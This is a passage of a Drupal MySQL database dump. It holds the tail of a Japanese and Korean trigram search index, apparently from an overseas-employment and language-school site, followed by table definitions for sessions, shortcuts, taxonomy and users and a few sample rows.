('詳細を', 0.142549),
('誇りに', 0.210986),
('語が勉', 0.30103),
('語だけ', 0.30103),
('語で理', 0.293845),
('語など', 0.30103),
('語のア', 0.30103),
('語の会', 0.30103),
('語の授', 0.30103),
('語の達', 0.30103),
('語は重', 0.30103),
('語をマ', 0.30103),
('語を上', 0.30103),
('語を学', 0.30103),
('語を少', 0.30103),
('語を流', 0.188306),
('語クラ', 0.30103),
('語コー', 0.0669468),
('語セン', 0.251199),
('語チャ', 0.30103),
('語不安', 0.30103),
('語学の', 0.09691),
('語学学', 0.30103),
('語学校', 0.10775),
('語学習', 0.200957),
('語彙を', 0.207697),
('語教育', 0.30103),
('語能力', 0.146721),
('語要件', 0.30103),
('誠実さ', 0.30103),
('説明さ', 0.124939),
('説明し', 0.124939),
('読解力', 0.30103),
('誰が参', 0.00998422),
('誰もが', 0.30103),
('課題を', 0.30103),
('講のチ', 0.09691),
('講師か', 0.30103),
('講師が', 0.176091),
('講師の', 0.30103),
('謝しま', 0.30103),
('謝申し', 0.30103),
('識と理', 0.188306),
('識と経', 0.30103),
('識を学', 0.30103),
('議では', 0.30103),
('護の面', 0.30103),
('護クラ', 0.0222764),
('護ビザ', 0.30103),
('護施設', 0.30103),
('護職研', 0.30103),
('護関係', 0.256767),
('豊かな', 0.179818),
('豊富で', 0.30103),
('豊富な', 0.0293938),
('負けな', 0.176091),
('財政的', 0.30103),
('販売す', 0.30103),
('販売と', 0.30103),
('販売を', 0.30103),
('責任者', 0.30103),
('貴重な', 0.147586),
('買を行', 0.30103),
('買経験', 0.188306),
('費は支', 0.30103),
('費を差', 0.176091),
('費を支', 0.30103),
('資する', 0.30103),
('資格の', 0.30103),
('資機材', 0.30103),
('資源開', 0.30103),
('賛を受', 0.30103),
('賛を深', 0.30103),
('賞賛を', 0.244068),
('質問や', 0.30103),
('購買経', 0.188306),
('越した', 0.30103),
('越し続', 0.30103),
('足いた', 0.30103),
('路交通', 0.30103),
('践的な', 0.10404),
('躍が大', 0.30103),
('躍する', 0.30103),
('身に付', 0.30103),
('身を目', 0.30103),
('身的な', 0.30103),
('車の輸', 0.30103),
('車を日', 0.30103),
('車修理', 0.30103),
('車商社', 0.30103),
('車売買', 0.30103),
('車販売', 0.30103),
('軽にお', 0.30103),
('軽減し', 0.30103),
('軽減す', 0.30103),
('輩を尊', 0.30103),
('輸入し', 0.271828),
('輸入許', 0.244843),
('輸入販', 0.30103),
('輸送用', 0.30103),
('輸通信', 0.0579919),
('辞めて', 0.30103),
('農業関', 0.30103),
('辺都市', 0.30103),
('込みの', 0.124939),
('込んで', 0.30103),
('迅速に', 0.124939),
('迎えら', 0.0579919),
('迎える', 0.30103),
('送りま', 0.30103),
('送用各', 0.30103),
('逃しな', 0.30103),
('通して', 0.181785),
('通じて', 0.227187),
('通りで', 0.266061),
('通信省', 0.0579919),
('通常の', 0.30103),
('通手段', 0.30103),
('通機関', 0.30103),
('通総局', 0.30103),
('通費を', 0.30103),
('速に来', 0.124939),
('造職の', 0.30103),
('造船所', 0.00471511),
('連する', 0.163845),
('連合領', 0.30103),
('連携も', 0.30103),
('連経験', 0.30103),
('進する', 0.30103),
('遅滞な', 0.30103),
('遇する', 0.209597),
('運営し', 0.30103),
('運営を', 0.30103),
('運輸通', 0.0579919),
('過去に', 0.30103),
('道へ出', 0.176091),
('道徳心', 0.30103),
('道路交', 0.30103),
('達と記', 0.0137883),
('達には', 0.1669),
('達のた', 0.30103),
('達の元', 0.30103),
('達の訓', 0.30103),
('達を生', 0.176091),
('達成に', 0.30103),
('達成の', 0.30103),
('適切な', 0.30103),
('遭遇す', 0.209027),
('選ばれ', 0.30103),
('選ぶに', 0.30103),
('選外食', 0.0791812),
('郡区の', 0.30103),
('部であ', 0.195659),
('部とし', 0.30103),
('部は以', 0.30103),
('部への', 0.30103),
('部長を', 0.30103),
('部門で', 0.271013),
('部門の', 0.30103),
('都市で', 0.30103),
('配する', 0.30103),
('配を促', 0.30103),
('重なア', 0.30103),
('重な支', 0.30103),
('重な職', 0.30103),
('重に徹', 0.30103),
('重ねた', 0.30103),
('重を基', 0.30103),
('重要で', 0.235149),
('重要性', 0.176091),
('野での', 0.176091),
('野で働', 0.144252),
('野の管', 0.184747),
('野菜や', 0.30103),
('金の機', 0.30103),
('金を除', 0.268714),
('金額や', 0.176091),
('銀行ロ', 0.30103),
('録して', 0.124939),
('録にや', 0.30103),
('録に来', 0.176091),
('録保持', 0.188306),
('録番号', 0.184298),
('長の言', 0.30103),
('長を提', 0.30103),
('長崎へ', 0.09691),
('門での', 0.30103),
('門で住', 0.30103),
('門の両', 0.30103),
('門コン', 0.30103),
('門作業', 0.30103),
('門学位', 0.30103),
('門家に', 0.184747),
('門知識', 0.229581),
('開いて', 0.230794),
('開けま', 0.30103),
('開始い', 0.30103),
('開始し', 0.0791812),
('開始日', 0.262886),
('開発大', 0.30103),
('開設し', 0.30103),
('間およ', 0.30103),
('間に投', 0.30103),
('間に損', 0.30103),
('間の専', 0.30103),
('間の建', 0.30103),
('間の残', 0.176091),
('間をか', 0.30103),
('間を厳', 0.0791812),
('間を通', 0.30103),
('間住宅', 0.30103),
('間内に', 0.30103),
('間続け', 0.30103),
('間部門', 0.30103),
('関およ', 0.30103),
('関する', 0.30103),
('関とし', 0.30103),
('関係の', 0.30103),
('関係を', 0.30103),
('関連す', 0.163639),
('関連経', 0.30103),
('降に残', 0.30103),
('限に活', 0.30103),
('限り手', 0.30103),
('除しま', 0.30103),
('階建て', 0.225565),
('際の適', 0.30103),
('際スタ', 0.176091),
('際使え', 0.30103),
('集して', 0.0620058),
('雇用さ', 0.01524),
('雇用す', 0.30103),
('雑な建', 0.30103),
('雑な漢', 0.30103),
('難に遭', 0.30103),
('電力工', 0.30103),
('電子工', 0.30103),
('電気エ', 0.0147233),
('青少年', 0.30103),
('面だけ', 0.30103),
('面接に', 0.0134532),
('面接の', 0.30103),
('面接合', 0.0143731),
('韓国が', 0.30103),
('韓国で', 0.30103),
('韓国な', 0.281563),
('韓国に', 0.0695033),
('韓国の', 0.00505351),
('韓国側', 0.01524),
('韓国語', 0.0143113),
('頃な価', 0.30103),
('項です', 0.30103),
('順を丁', 0.30103),
('頑張っ', 0.30103),
('領土を', 0.30103),
('頼して', 0.203393),
('頼でき', 0.30103),
('頼とと', 0.30103),
('題あり', 0.30103),
('題です', 0.30103),
('題など', 0.30103),
('題を排', 0.30103),
('題を軽', 0.30103),
('額や生', 0.176091),
('類なき', 0.30103),
('類関係', 0.30103),
('食を取', 0.30103),
('食ビザ', 0.30103),
('食事は', 0.30103),
('食事を', 0.30103),
('食合格', 0.30103),
('食品サ', 0.30103),
('食品製', 0.30103),
('食品関', 0.30103),
('食実習', 0.30103),
('食店の', 0.0791812),
('食材の', 0.30103),
('食業界', 0.30103),
('食面接', 0.09691),
('飲食店', 0.0791812),
('飲食業', 0.30103),
('験があ', 0.30103),
('験が必', 0.10428),
('験も身', 0.30103),
('験を受', 0.100179),
('験を持', 0.132366),
('験を提', 0.20178),
('験を積', 0.0188016),
('験登録', 0.124939),
('験豊か', 0.30103),
('験豊富', 0.0285404),
('高い生', 0.176091),
('高い研', 0.30103),
('高等学', 0.30103),
('高齢者', 0.30103),
('鮮な旬', 0.30103),
('黄金の', 0.30103),
('齢者介', 0.30103),
('가고자', 0.30103),
('가라떵', 0.30103),
('가르치', 0.30103),
('가르칩', 0.30103),
('가에서', 0.19752),
('가포르', 0.0143572),
('각지에', 0.30103),
('간호지', 0.30103),
('감사드', 0.30103),
('강하려', 0.30103),
('개발한', 0.30103),
('개설하', 0.30103),
('개설했', 0.124939),
('개하고', 0.30103),
('개회사', 0.10457),
('객들이', 0.09691),
('것입니', 0.30103),
('게다가', 0.30103),
('격시험', 0.30103),
('격하는', 0.30103),
('견하는', 0.30103),
('결과를', 0.124939),
('결하고', 0.30103),
('경우에', 0.30103),
('경제통', 0.30103),
('경험에', 0.176091),
('경험이', 0.176091),
('계공학', 0.30103),
('계하고', 0.30103),
('계하여', 0.30103),
('고객들', 0.09691),
('고용업', 0.30103),
('고용주', 0.30103),
('공정한', 0.30103),
('공하고', 0.15192),
('공하기', 0.30103),
('공하는', 0.185787),
('공함해', 0.30103),
('공합니', 0.153293),
('공했습', 0.178954),
('과적인', 0.30103),
('과정과', 0.30103),
('과정들', 0.30103),
('관계를', 0.09691),
('관심있', 0.124939),
('관행의', 0.30103),
('교육과', 0.30103),
('교육센', 0.30103),
('교육시', 0.30103),
('교육을', 0.115788),
('교통통', 0.182335),
('구사할', 0.176091),
('구축하', 0.09691),
('국가에', 0.196939),
('국에서', 0.176091),
('국인고', 0.30103),
('국제이', 0.30103),
('국제채', 0.30103),
('굴하는', 0.30103),
('그리고', 0.30103),
('근로자', 0.176091),
('금들을', 0.30103),
('급하게', 0.01524),
('기계공', 0.30103),
('기계를', 0.30103),
('기관과', 0.30103),
('기능인', 0.30103),
('기량검', 0.30103),
('기쁩니', 0.30103),
('기술을', 0.224574),
('기업들', 0.30103),
('기업체', 0.30103),
('기준에', 0.18904),
('기초부', 0.30103),
('기회를', 0.0610597),
('기회에', 0.30103),
('긴급하', 0.01524),
('끊임없', 0.30103),
('나라를', 0.30103),
('냈습니', 0.30103),
('너들와', 0.30103),
('년들에', 0.192567),
('노동자', 0.0147233),
('노력하', 0.202467),
('누들이', 0.30103),
('뉴코멧', 0.0172545),
('뉸타운', 0.30103),
('는자매', 0.30103),
('능인력', 0.30103),
('니어링', 0.30103),
('다양한', 0.176091),
('다음과', 0.01524),
('달성을', 0.30103),
('담당자', 0.01524),
('당으로', 0.30103),
('당자인', 0.01524),
('대행사', 0.0457575),
('도와주', 0.30103),
('도움되', 0.30103),
('도움을', 0.30103),
('도움이', 0.30103),
('도쿠테', 0.30103),
('동자들', 0.0147233),
('되도록', 0.30103),
('되었습', 0.30103),
('두바이', 0.193188),
('드리고', 0.30103),
('드리기', 0.30103),
('드립니', 0.30103),
('득하도', 0.30103),
('득하여', 0.30103),
('들에게', 0.192794),
('등록번', 0.30103),
('등록해', 0.124939),
('등에서', 0.30103),
('떵뉸타', 0.30103),
('라떵뉸', 0.30103),
('락해주', 0.30103),
('람들을', 0.210144),
('량검증', 0.30103),
('러분을', 0.30103),
('러분의', 0.30103),
('레이너', 0.30103),
('레이딩', 0.0234811),
('레이시', 0.133792),
('려움을', 0.30103),
('력으로', 0.01524),
('력있는', 0.30103),
('력하고', 0.202653),
('력하여', 0.30103),
('련하고', 0.30103),
('렴제도', 0.30103),
('로부터', 0.30103),
('로자를', 0.30103),
('로젝트', 0.30103),
('록번호', 0.30103),
('록해주', 0.124939),
('르에서', 0.01524),
('르치고', 0.30103),
('르칩니', 0.30103),
('리합니', 0.30103),
('립니다', 0.30103),
('립되어', 0.30103),
('립되었', 0.30103),
('마련하', 0.30103),
('마스터', 0.30103),
('마에서', 0.30103),
('말레이', 0.133517),
('망하는', 0.180103),
('맞이할', 0.30103),
('매하는', 0.30103),
('멧건설', 0.30103),
('멧회사', 0.30103),
('면허를', 0.30103),
('명했습', 0.124939),
('목표는', 0.30103),
('목표로', 0.30103),
('문대학', 0.30103),
('문이나', 0.30103),
('문화와', 0.30103),
('미얀마', 0.0627467),
('민가라', 0.30103),
('바이버', 0.30103),
('발굴하', 0.30103),
('발하고', 0.30103),
('방문에', 0.124939),
('방법을', 0.30103),
('배우고', 0.30103),
('배출하', 0.30103),
('보세요', 0.30103),
('본어를', 0.30103),
('본에서', 0.30103),
('본으로', 0.134601),
('부에서', 0.30103),
('부처로', 0.30103),
('분들은', 0.124939),
('분들을', 0.30103),
('분들이', 0.30103),
('비되어', 0.30103),
('비스들', 0.30103),
('비스를', 0.113832),
('비스와', 0.30103),
('비자로', 0.197139),
('비즈니', 0.30103),
('비하면', 0.09691),
('빠르게', 0.124939),
('쁩니다', 0.30103),
('사드립', 0.30103),
('사들은', 0.30103),
('사람들', 0.209781),
('사로서', 0.30103),
('사업을', 0.30103),
('사업자', 0.30103),
('사업체', 0.30103),
('사용되', 0.30103),
('사용하', 0.30103),
('사이에', 0.30103),
('사이트', 0.0222764),
('산하도', 0.30103),
('산하의', 0.30103),
('상용트', 0.30103),
('상자원', 0.30103),
('상황과', 0.30103),
('색하시', 0.30103),
('생산하', 0.30103),
('서비스', 0.0115312),
('선발하', 0.30103),
('선소로', 0.30103),
('선소에', 0.128817),
('선하고', 0.30103),
('선호하', 0.09691),
('설립되', 0.176091),
('설명했', 0.124939),
('설하여', 0.30103),
('설했습', 0.124939),
('성하고', 0.30103),
('세금들', 0.30103),
('센터에', 0.30103),
('센터와', 0.30103),
('소개하', 0.30103),
('소개회', 0.10457),
('소수민', 0.30103),
('소에서', 0.128947),
('속되는', 0.09691),
('송단길', 0.30103),
('수강하', 0.30103),
('수민족', 0.30103),
('수비자', 0.19693),
('수업을', 0.210566),
('수입허', 0.30103),
('슈웨삐', 0.30103),
('스들을', 0.30103),
('스터하', 0.30103),
('습니다', 0.016868),
('습득하', 0.30103),
('시기에', 0.124939),
('시작하', 0.176091),
('시키고', 0.176091),
('신뢰로', 0.09691),
('신청했', 0.30103),
('실력있', 0.30103),
('실현할', 0.30103),
('심있는', 0.124939),
('십시오', 0.30103),
('싱가포', 0.0143541),
('싶다면', 0.30103),
('쌍둥이', 0.30103),
('씬마락', 0.183419),
('아드리', 0.30103),
('아보세', 0.30103),
('아웅네', 0.30103),
('않도록', 0.30103),
('알아보', 0.30103),
('야뉴코', 0.30103),
('야슈웨', 0.30103),
('얀마에', 0.30103),
('얀마의', 0.193692),
('양성하', 0.30103),
('어교육', 0.30103),
('어려움', 0.30103),
('어학당', 0.30103),
('언어교', 0.30103),
('언제든', 0.30103),
('업들과', 0.30103),
('업비자', 0.30103),
('업소개', 0.136314),
('업으로', 0.30103),
('업자등', 0.30103),
('업체로', 0.30103),
('업체를', 0.30103),
('없도록', 0.30103),
('었습니', 0.30103),
('에서는', 0.30103),
('에이전', 0.0193052),
('엔지니', 0.30103),
('여기에', 0.30103),
('여러분', 0.176091),
('여정에', 0.30103),
('역에서', 0.30103),
('연결하', 0.30103),
('연계하', 0.234096),
('연락처', 0.0157943),
('연락해', 0.30103),
('연수비', 0.19672),
('였습니', 0.176091),
('영어를', 0.176091),
('영업을', 0.30103),
('영합니', 0.0263289),
('와주고', 0.30103),
('외국에', 0.176091),
('외국의', 0.30103),
('외국인', 0.30103),
('외직업', 0.136314),
('외취업', 0.30103),
('요하는', 0.30103),
('요하신', 0.30103),
('요합니', 0.176091),
('용되는', 0.30103),
('용접공', 0.1863),
('용주와', 0.30103),
('용청렴', 0.30103),
('용트럭', 0.30103),
('용하는', 0.30103),
('우리는', 0.30103),
('우리의', 0.00634018),
('우수한', 0.30103),
('운송에', 0.30103),
('움되는', 0.30103),
('웅네원', 0.30103),
('원부에', 0.30103),
('원에게', 0.178954),
('원하고', 0.30103),
('원하는', 0.199257),
('웨삐띡', 0.30103),
('웹사이', 0.0222764),
('유능한', 0.30103),
('유롭게', 0.30103),
('유형의', 0.30103),
('육센터', 0.30103),
('육시킴', 0.30103),
('윤리적', 0.30103),
('율적으', 0.30103),
('이너들', 0.30103),
('이메일', 0.30103),
('이상에', 0.30103),
('이상의', 0.178954),
('이시아', 0.134067),
('이전시', 0.0193052),
('이주기', 0.30103),
('이트를', 0.30103),
('이트에', 0.0263289),
('이해가', 0.176091),
('익히도', 0.30103),
('인고용', 0.30103),
('인력을', 0.30103),
('인재를', 0.30103),
('인종과', 0.30103),
('일본어', 0.0132796),
('일본에', 0.198373),
('일본으', 0.134502),
('일본의', 0.194356),
('일하고', 0.176091),
('일하기', 0.1981),
('임없이', 0.30103),
('입니다', 0.30103),
('입허가', 0.30103),
('있다면', 0.30103),
('있도록', 0.158568),
('있습니', 0.0314942),
('있어야', 0.09691),
('있으며', 0.30103),
('자격시', 0.30103),
('자동차', 0.178078),
('자들을', 0.30103),
('자들이', 0.01524),
('자등록', 0.30103),
('자매를', 0.30103),
('자세히', 0.30103),
('자원부', 0.30103),
('자유롭', 0.30103),
('작업을', 0.30103),
('작하였', 0.176091),
('장에서', 0.191649),
('저희가', 0.30103),
('저희는', 0.30103),
('저희에', 0.30103),
('적으로', 0.30103),
('전문대', 0.30103),
('전통문', 0.30103),
('전화번', 0.30103),
('접공이', 0.30103),
('정들과', 0.30103),
('정보를', 0.30103),
('정에서', 0.30103),
('제공을', 0.30103),
('제공하', 0.0798117),
('제공함', 0.30103),
('제공합', 0.153138),
('제공했', 0.178954),
('제든지', 0.30103),
('제들을', 0.30103),
('제야뉴', 0.30103),
('제야슈', 0.30103),
('제이주', 0.30103),
('제정한', 0.188059),
('제채용', 0.30103),
('제통상', 0.30103),
('조선소', 0.100115),
('조정자', 0.30103),
('종교의', 0.30103),
('종사해', 0.30103),
('주기구', 0.30103),
('주선하', 0.30103),
('주세요', 0.124939),
('주십시', 0.30103),
('준비되', 0.30103),
('즈니스', 0.30103),
('지니어', 0.30103),
('지속되', 0.09691),
('지식과', 0.176091),
('지에서', 0.30103),
('지역에', 0.30103),
('지원하', 0.30103),
('직업소', 0.136314),
('직업으', 0.30103),
('직원에', 0.178954),
('직장에', 0.132513),
('질문이', 0.30103),
('찾아드', 0.30103),
('채용청', 0.30103),
('처로부', 0.30103),
('청년들', 0.192339),
('청렴제', 0.30103),
('청했고', 0.30103),
('초부터', 0.30103),
('최고의', 0.30103),
('최대한', 0.30103),
('축하기', 0.09691),
('출하여', 0.30103),
('취득하', 0.30103),
('취업비', 0.30103),
('취업을', 0.179531),
('취업할', 0.30103),
('취직을', 0.30103),
('치누들', 0.30103),
('칩니다', 0.30103),
('컴퓨터', 0.128817),
('코멧건', 0.30103),
('코멧회', 0.30103),
('코스를', 0.0143811),
('코스와', 0.01524),
('쿠테이', 0.30103),
('타운십', 0.30103),
('타지역', 0.30103),
('탐색하', 0.30103),
('태국어', 0.30103),
('터에서', 0.30103),
('터하고', 0.30103),
('통문화', 0.30103),
('통상자', 0.30103),
('통신부', 0.18288),
('통통신', 0.182608),
('트레이', 0.0224073),
('파견하', 0.30103),
('파송단', 0.30103),
('판매하', 0.30103),
('편리합', 0.30103),
('포르에', 0.01524),
('표현을', 0.30103),
('풍속을', 0.30103),
('프로젝', 0.30103),
('피해가', 0.30103),
('필요가', 0.01524),
('필요에', 0.30103),
('필요하', 0.18315),
('필요한', 0.0579097),
('필요합', 0.176091),
('하기를', 0.198679),
('하도록', 0.20056),
('하려는', 0.30103),
('하시고', 0.30103),
('하였습', 0.176091),
('학당도', 0.30103),
('학당으', 0.30103),
('학위가', 0.30103),
('한국어', 0.0143455),
('함해외', 0.30103),
('합격하', 0.30103),
('합격할', 0.30103),
('합니다', 0.0167964),
('해외로', 0.30103),
('해외직', 0.136314),
('해외취', 0.30103),
('해주세', 0.124939),
('해주십', 0.30103),
('했습니', 0.0513883),
('행사는', 0.30103),
('행사에', 0.09691),
('행사와', 0.09691),
('허가를', 0.30103),
('협력으', 0.01524),
('협력하', 0.30103),
('형제들', 0.30103),
('호지원', 0.30103),
('호하는', 0.09691),
('홍씨가', 0.01524),
('화번호', 0.30103),
('환영합', 0.0263289),
('활동을', 0.30103),
('회사는', 0.124939),
('회사들', 0.30103),
('회사등', 0.30103),
('회사로', 0.30103),
('회사의', 0.0157943),
('회사인', 0.176091),
('효과적', 0.30103),
('효율적', 0.30103),
('훈련과', 0.30103),
('희망하', 0.179818),
('희에게', 0.30103),
('히도록', 0.30103);

-- --------------------------------------------------------

--
-- Table structure for table `semaphore`
--

CREATE TABLE `semaphore` (
  `name` varchar(255) CHARACTER SET ascii COLLATE ascii_general_ci NOT NULL DEFAULT '' COMMENT 'Primary Key: Unique name.',
  `value` varchar(255) CHARACTER SET ascii COLLATE ascii_general_ci NOT NULL DEFAULT '' COMMENT 'A value for the semaphore.',
  `expire` double NOT NULL COMMENT 'A Unix timestamp with microseconds indicating when the semaphore should expire.'
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb3 COMMENT='Table for holding semaphores, locks, flags, etc. that…';

-- --------------------------------------------------------

--
-- Table structure for table `sequences`
--

CREATE TABLE `sequences` (
  `value` int UNSIGNED NOT NULL COMMENT 'The value of the sequence.'
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb3 COMMENT='Stores IDs.';

--
-- Dumping data for table `sequences`
--

INSERT INTO `sequences` (`value`) VALUES
(14);

-- --------------------------------------------------------

--
-- Table structure for table `sessions`
--

CREATE TABLE `sessions` (
  `uid` int UNSIGNED NOT NULL COMMENT 'The "users".uid corresponding to a session, or 0 for anonymous user.',
  `sid` varchar(128) CHARACTER SET ascii COLLATE ascii_general_ci NOT NULL COMMENT 'A session ID (hashed). The value is generated by Drupal''s session handlers.',
  `hostname` varchar(128) CHARACTER SET ascii COLLATE ascii_general_ci NOT NULL DEFAULT '' COMMENT 'The IP address that last used this session ID (sid).',
  `timestamp` bigint NOT NULL DEFAULT '0' COMMENT 'The Unix timestamp when this session last requested a page. Old records are purged by PHP automatically.',
  `session` longblob COMMENT 'The serialized contents of the user''s session, an array of name/value pairs that persists across page requests by this session ID. Drupal loads the user''s session from here at the start of each request and saves it at the end.'
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb3 COMMENT='Drupal''s session handlers read and write into the sessions…';

--
-- Dumping data for table `sessions`
--

INSERT INTO `sessions` (`uid`, `sid`, `hostname`, `timestamp`, `session`) VALUES
(2, 'yetiM8qxrEqqrqmmYN3pH8KnNSLdykEqRTGp_aXzzAM', '::1', 1787925399, 0x5f7366325f617474726962757465737c613a313a7b733a333a22756964223b733a313a2232223b7d5f7366325f6d6574617c613a343a7b733a313a2275223b693a313738373932353430333b733a313a2263223b693a313738373833363339363b733a313a226c223b693a323030303030303b733a313a2273223b733a34333a22335f6c5f5f796e456e6675686c7556415a6f714b535f7137353946564446346273706853744d7a66615230223b7d);

-- --------------------------------------------------------

--
-- Table structure for table `shortcut`
--

CREATE TABLE `shortcut` (
  `id` int UNSIGNED NOT NULL,
  `shortcut_set` varchar(32) CHARACTER SET ascii COLLATE ascii_general_ci NOT NULL COMMENT 'The ID of the target entity.',
  `uuid` varchar(128) CHARACTER SET ascii COLLATE ascii_general_ci NOT NULL,
  `langcode` varchar(12) CHARACTER SET ascii COLLATE ascii_general_ci NOT NULL
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb3 COMMENT='The base table for shortcut entities.';

-- --------------------------------------------------------

--
-- Table structure for table `shortcut_field_data`
--

CREATE TABLE `shortcut_field_data` (
  `id` int UNSIGNED NOT NULL,
  `shortcut_set` varchar(32) CHARACTER SET ascii COLLATE ascii_general_ci NOT NULL COMMENT 'The ID of the target entity.',
  `langcode` varchar(12) CHARACTER SET ascii COLLATE ascii_general_ci NOT NULL,
  `title` varchar(255) DEFAULT NULL,
  `weight` int DEFAULT NULL,
  `link__uri` varchar(2048) DEFAULT NULL COMMENT 'The URI of the link.',
  `link__title` varchar(255) DEFAULT NULL COMMENT 'The link text.',
  `link__options` longblob COMMENT 'Serialized array of options for the link.',
  `default_langcode` tinyint NOT NULL
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb3 COMMENT='The data table for shortcut entities.';

-- --------------------------------------------------------

--
-- Table structure for table `shortcut_set_users`
--

CREATE TABLE `shortcut_set_users` (
  `uid` int UNSIGNED NOT NULL DEFAULT '0' COMMENT 'The "users".uid for this set.',
  `set_name` varchar(32) CHARACTER SET ascii COLLATE ascii_general_ci NOT NULL DEFAULT '' COMMENT 'The "shortcut_set".set_name that will be displayed for this user.'
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb3 COMMENT='Maps users to shortcut sets.';

-- --------------------------------------------------------

--
-- Table structure for table `taxonomy_index`
--

CREATE TABLE `taxonomy_index` (
  `nid` int UNSIGNED NOT NULL DEFAULT '0' COMMENT 'The "node".nid this record tracks.',
  `tid` int UNSIGNED NOT NULL DEFAULT '0' COMMENT 'The term ID.',
  `status` int NOT NULL DEFAULT '1' COMMENT 'Boolean indicating whether the node is published (visible to non-administrators).',
  `sticky` tinyint DEFAULT '0' COMMENT 'Boolean indicating whether the node is sticky.',
  `created` int NOT NULL DEFAULT '0' COMMENT 'The Unix timestamp when the node was created.'
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb3 COMMENT='Maintains denormalized information about node/term…';

-- --------------------------------------------------------

--
-- Table structure for table `taxonomy_term_data`
--

CREATE TABLE `taxonomy_term_data` (
  `tid` int UNSIGNED NOT NULL,
  `revision_id` int UNSIGNED DEFAULT NULL,
  `vid` varchar(32) CHARACTER SET ascii COLLATE ascii_general_ci NOT NULL COMMENT 'The ID of the target entity.',
  `uuid` varchar(128) CHARACTER SET ascii COLLATE ascii_general_ci NOT NULL,
  `langcode` varchar(12) CHARACTER SET ascii COLLATE ascii_general_ci NOT NULL
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb3 COMMENT='The base table for taxonomy_term entities.';

-- --------------------------------------------------------

--
-- Table structure for table `taxonomy_term_field_data`
--

CREATE TABLE `taxonomy_term_field_data` (
  `tid` int UNSIGNED NOT NULL,
  `revision_id` int UNSIGNED NOT NULL,
  `vid` varchar(32) CHARACTER SET ascii COLLATE ascii_general_ci NOT NULL COMMENT 'The ID of the target entity.',
  `langcode` varchar(12) CHARACTER SET ascii COLLATE ascii_general_ci NOT NULL,
  `status` tinyint NOT NULL,
  `name` varchar(255) NOT NULL,
  `description__value` longtext,
  `description__format` varchar(255) CHARACTER SET ascii COLLATE ascii_general_ci DEFAULT NULL,
  `weight` int NOT NULL,
  `changed` int DEFAULT NULL,
  `default_langcode` tinyint NOT NULL,
  `revision_translation_affected` tinyint DEFAULT NULL
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb3 COMMENT='The data table for taxonomy_term entities.';

-- --------------------------------------------------------

--
-- Table structure for table `taxonomy_term_field_revision`
--

CREATE TABLE `taxonomy_term_field_revision` (
  `tid` int UNSIGNED NOT NULL,
  `revision_id` int UNSIGNED NOT NULL,
  `langcode` varchar(12) CHARACTER SET ascii COLLATE ascii_general_ci NOT NULL,
  `status` tinyint NOT NULL,
  `name` varchar(255) DEFAULT NULL,
  `description__value` longtext,
  `description__format` varchar(255) CHARACTER SET ascii COLLATE ascii_general_ci DEFAULT NULL,
  `changed` int DEFAULT NULL,
  `default_langcode` tinyint NOT NULL,
  `revision_translation_affected` tinyint DEFAULT NULL
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb3 COMMENT='The revision data table for taxonomy_term entities.';

-- --------------------------------------------------------

--
-- Table structure for table `taxonomy_term_revision`
--

CREATE TABLE `taxonomy_term_revision` (
  `tid` int UNSIGNED NOT NULL,
  `revision_id` int UNSIGNED NOT NULL,
  `langcode` varchar(12) CHARACTER SET ascii COLLATE ascii_general_ci NOT NULL,
  `revision_user` int UNSIGNED DEFAULT NULL COMMENT 'The ID of the target entity.',
  `revision_created` int DEFAULT NULL,
  `revision_log_message` longtext,
  `revision_default` tinyint DEFAULT NULL
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb3 COMMENT='The revision table for taxonomy_term entities.';

-- --------------------------------------------------------

--
-- Table structure for table `taxonomy_term_revision__parent`
--

CREATE TABLE `taxonomy_term_revision__parent` (
  `bundle` varchar(128) CHARACTER SET ascii COLLATE ascii_general_ci NOT NULL DEFAULT '' COMMENT 'The field instance bundle to which this row belongs, used when deleting a field instance',
  `deleted` tinyint NOT NULL DEFAULT '0' COMMENT 'A boolean indicating whether this data item has been deleted',
  `entity_id` int UNSIGNED NOT NULL COMMENT 'The entity id this data is attached to',
  `revision_id` int UNSIGNED NOT NULL COMMENT 'The entity revision id this data is attached to',
  `langcode` varchar(32) CHARACTER SET ascii COLLATE ascii_general_ci NOT NULL DEFAULT '' COMMENT 'The language code for this data item.',
  `delta` int UNSIGNED NOT NULL COMMENT 'The sequence number for this data item, used for multi-value fields',
  `parent_target_id` int UNSIGNED NOT NULL COMMENT 'The ID of the target entity.'
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb3 COMMENT='Revision archive storage for taxonomy_term field parent.';

-- --------------------------------------------------------

--
-- Table structure for table `taxonomy_term__parent`
--

CREATE TABLE `taxonomy_term__parent` (
  `bundle` varchar(128) CHARACTER SET ascii COLLATE ascii_general_ci NOT NULL DEFAULT '' COMMENT 'The field instance bundle to which this row belongs, used when deleting a field instance',
  `deleted` tinyint NOT NULL DEFAULT '0' COMMENT 'A boolean indicating whether this data item has been deleted',
  `entity_id` int UNSIGNED NOT NULL COMMENT 'The entity id this data is attached to',
  `revision_id` int UNSIGNED NOT NULL COMMENT 'The entity revision id this data is attached to',
  `langcode` varchar(32) CHARACTER SET ascii COLLATE ascii_general_ci NOT NULL DEFAULT '' COMMENT 'The language code for this data item.',
  `delta` int UNSIGNED NOT NULL COMMENT 'The sequence number for this data item, used for multi-value fields',
  `parent_target_id` int UNSIGNED NOT NULL COMMENT 'The ID of the target entity.'
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb3 COMMENT='Data storage for taxonomy_term field parent.';

-- --------------------------------------------------------

--
-- Table structure for table `users`
--

CREATE TABLE `users` (
  `uid` int UNSIGNED NOT NULL,
  `uuid` varchar(128) CHARACTER SET ascii COLLATE ascii_general_ci NOT NULL,
  `langcode` varchar(12) CHARACTER SET ascii COLLATE ascii_general_ci NOT NULL
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb3 COMMENT='The base table for user entities.';

--
-- Dumping data for table `users`
--

INSERT INTO `users` (`uid`, `uuid`, `langcode`) VALUES
(0, '0aa6f732-8550-4fdb-8bff-c68e004ff3df', 'en'),
(1, '14f2cfb1-a571-4d0c-955e-760d5187e422', 'en'),
(2, '251e7da3-2551-441a-bc97-8622a11bd959', 'en');

-- --------------------------------------------------------

--
